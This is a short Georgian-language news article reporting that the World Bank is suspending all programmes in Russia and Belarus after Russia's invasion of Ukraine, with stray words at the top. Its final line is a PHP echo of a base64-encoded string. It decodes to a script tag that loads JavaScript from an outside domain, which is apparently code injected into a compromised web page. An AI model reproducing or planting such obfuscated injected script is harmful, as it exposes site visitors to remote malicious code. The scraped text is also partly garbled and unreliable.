celsiusi
ავერსი შნაიდერი
მსოფლიო ბანკი რუსეთსა და ბელარუსში ყველა პროგრამას დროებით აჩერებს. მიზეზი რუსეთის მიერ უკრაინაში ინტერვენცია და მის ტერიტორიაზე საომარი მოქმედებების დაწყებაა.  
 
განვითარების ბანკი ბანკი აცხადებს, რომ 2014 წლის შემდეგ ანუ მას შემდეგ, რაც რუსეთმა ყირიმის რეგიონის ანექსია მოახდინა, ბანკს რუსეთისთვის ახალი სესხი არ დაუმტკიცებია და არც რაიმე ინვესტიცია განუხორციელებია.  
 
ბანკის ინფორმაციით, საპრეზიდენტო არჩევნების შემდეგ, რასაც აშშ-ის სანქციები მოჰყვა, ბელარუსისთვისაც არ დაუმტკიცებია სესხი.  ჯამში, მსოფლიო ბანკს ბელარუსისთვის 2020 წლისთვის 308 მლნ აშშ დოლარი სესხი ჰქონდა დამტკიცებული. რაც შეეხება რუსეთს, 1990-იანი წლებიდან მსოფლიო ბანკმა რუსეთს, ჯამში, 16 მილიარდი დოლარზე მეტი მოცულობის სესხი გამოუყო.  
 
გადაწყვეტილებას, რომ შეაჩერონ ყველა პროგრამა რუსეთსა და ბელარუსში, წინ უძღოდა მსოფლიო ბანკისა და საერთაშორისო სავალუტო ფონდის ხელმძღვანელების განცხადება, რომ უკრაინისთვის მილიარდობით დოლარის გამოყოფაზე მუშაობა მიმდინარეობს.
860
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");